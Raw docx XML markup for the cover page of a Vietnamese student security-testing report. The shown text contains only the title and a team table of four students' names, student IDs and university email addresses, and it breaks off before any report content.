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2D99" w14:textId="08DAAD23" w:rsidR="00F71EE9" w:rsidRPr="004E2F05" w:rsidRDefault="002B6C11" w:rsidP="002B6C11">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:color w:val="17375E"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E2F05">
        <w:rPr>
          <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
          <w:color w:val="17375E"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t>Báo cáo kết quả kiểm thử bảo mật hệ thống CNT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950"/>
        <w:gridCol w:w="1762"/>
        <w:gridCol w:w="3319"/>
      </w:tblGrid>
      <w:tr w:rsidR="00077523" w:rsidRPr="004E2F05" w14:paraId="1CBD9AF8" w14:textId="77777777" w:rsidTr="00077523">
        <w:trPr>
          <w:trHeight w:val="282"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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DD5137" w14:textId="3A8EAC2A" w:rsidR="004E2F05" w:rsidRPr="004E2F05" w:rsidRDefault="00077523">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="624"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Nhóm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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81A50A" w14:textId="77777777" w:rsidR="004E2F05" w:rsidRPr="004E2F05" w:rsidRDefault="004E2F05">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="25"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E2F05">
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Họ và tên</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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A54659" w14:textId="77777777" w:rsidR="004E2F05" w:rsidRPr="004E2F05" w:rsidRDefault="004E2F05">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E2F05">
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>MSSV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="33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88BCBE" w14:textId="77777777" w:rsidR="004E2F05" w:rsidRPr="004E2F05" w:rsidRDefault="004E2F05">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E2F05">
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00077523" w:rsidRPr="004E2F05" w14:paraId="1C02BC78" w14:textId="77777777" w:rsidTr="000B1540">
        <w:trPr>
          <w:trHeight w:val="282"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1435" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30EEDCAF" w14:textId="32FFB252" w:rsidR="00077523" w:rsidRPr="004E2F05" w:rsidRDefault="00077523" w:rsidP="000B1540">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>3Musketeers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5694EF14" w14:textId="7517C041" w:rsidR="00077523" w:rsidRPr="004E2F05" w:rsidRDefault="00077523">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="25"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Vương Minh Tiến</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AA4B360" w14:textId="10729C5C" w:rsidR="00077523" w:rsidRPr="004E2F05" w:rsidRDefault="00077523">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E2F05">
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1952</w:t>
            </w:r>
            <w:r w:rsidR="00451BF8">
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>346</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3306" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B822CF0" w14:textId="77777777" w:rsidR="00077523" w:rsidRPr="00C2610B" w:rsidRDefault="00077523">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C2610B">
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>19522263@gm.uit.edu.vn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00077523" w:rsidRPr="004E2F05" w14:paraId="42D19591" w14:textId="77777777" w:rsidTr="003A380C">
        <w:trPr>
          <w:trHeight w:val="282"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1435" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2650688C" w14:textId="67530DCD" w:rsidR="00077523" w:rsidRPr="004E2F05" w:rsidRDefault="00077523" w:rsidP="003A380C">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="75C791D5" w14:textId="2534355C" w:rsidR="00077523" w:rsidRDefault="00077523">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="25"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Nguyễn Văn Tài </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="04328375" w14:textId="35C51DEE" w:rsidR="00077523" w:rsidRPr="004E2F05" w:rsidRDefault="00077523">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>19520250</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3306" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="20E9C259" w14:textId="60962237" w:rsidR="00077523" w:rsidRPr="00C2610B" w:rsidRDefault="00911B8A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId8" w:history="1">
              <w:r w:rsidR="00077523" w:rsidRPr="00C2610B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                  <w:sz w:val="28"/>
                  <w:szCs w:val="28"/>
                  <w:u w:val="none"/>
                </w:rPr>
                <w:t>19520250@gm.uit.edu.vn</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00077523" w:rsidRPr="004E2F05" w14:paraId="7BFF2629" w14:textId="77777777" w:rsidTr="003A380C">
        <w:trPr>
          <w:trHeight w:val="416"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1435" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="300513CC" w14:textId="043484EF" w:rsidR="00077523" w:rsidRPr="004E2F05" w:rsidRDefault="00077523" w:rsidP="003A380C">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>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14:paraId="4DD54888" w14:textId="77777777" w:rsidR="00077523" w:rsidRPr="004E2F05" w:rsidRDefault="00077523">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="25"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E2F05">
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Phạm Thành Thái</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A4C77EE" w14:textId="77777777" w:rsidR="00077523" w:rsidRPr="004E2F05" w:rsidRDefault="00077523">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E2F05">
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>19520938</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3306" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32A195DE" w14:textId="3EC1E5F2" w:rsidR="00077523" w:rsidRPr="00C2610B" w:rsidRDefault="00911B8A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId9" w:history="1">
              <w:r w:rsidR="00077523" w:rsidRPr="00C2610B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                  <w:sz w:val="28"/>
                  <w:szCs w:val="28"/>
                  <w:u w:val="none"/>
                </w:rPr>
                <w:t>19520938@gm.uit.edu.vn</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00077523" w:rsidRPr="004E2F05" w14:paraId="2D8C3D71" w14:textId="77777777" w:rsidTr="003A380C">
        <w:trPr>
          <w:trHeight w:val="416"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1435" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="37D7E48F" w14:textId="4C4D9586" w:rsidR="00077523" w:rsidRPr="004E2F05" w:rsidRDefault="00077523">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3240" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="70681E55" w14:textId="125A6196" w:rsidR="00077523" w:rsidRPr="004E2F05" w:rsidRDefault="00077523">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="25"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Hoàng Văn Chúc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1812" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6560A1A8" w14:textId="0841DA90" w:rsidR="00077523" w:rsidRPr="004E2F05" w:rsidRDefault="00077523">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>19521288</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3306" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="472690C2" w14:textId="3EAC6E07" w:rsidR="00077523" w:rsidRPr="004E2F05" w:rsidRDefault="00077523">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UTM Neo Sans Intel" w:hAnsi="UTM Neo Sans Intel"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>19521288@gm.uit.edu.vn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="196BEF79" w14:textId="77777777" w:rsidR="00EC72F2" w:rsidRPr="003D4872" w:rsidRDefault="00EC72F2" w:rsidP="004E2F05">
      <w:pPr>
        <w:spacing w:before="200" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CCEB77E" w14:textId="12A99537" w:rsidR="00336ACC" w:rsidRPr="00F22355" w:rsidRDefault="0060384E" w:rsidP="00505021">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EE26AE7" wp14:editId="48D53F10">
            <wp:extent cx="2888055" cy="24536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0">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="51373"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2888055"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1624201" w14:textId="00C8AE36" w:rsidR="00336ACC" w:rsidRDefault="00336ACC" w:rsidP="00505021">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55AADD14" w14:textId="2A2215E6" w:rsidR="00516F2A" w:rsidRDefault="00516F2A" w:rsidP="00505021">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78AEDD56" w14:textId="676E22B4" w:rsidR="004F69CA" w:rsidRDefault="004F69CA" w:rsidP="00505021">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="073633FA" w14:textId="4574B677" w:rsidR="004F69CA" w:rsidRDefault="004F69CA" w:rsidP="00505021">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2988D95C" w14:textId="02076801" w:rsidR="004F69CA" w:rsidRDefault="004F69CA" w:rsidP="00505021">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="712DB013" w14:textId="77777777" w:rsidR="004F69CA" w:rsidRDefault="004F69CA" w:rsidP="00505021">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72ABF375" w14:textId="02315A95" w:rsidR="00516F2A" w:rsidRPr="004F69CA" w:rsidRDefault="004F69CA" w:rsidP="00505021">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
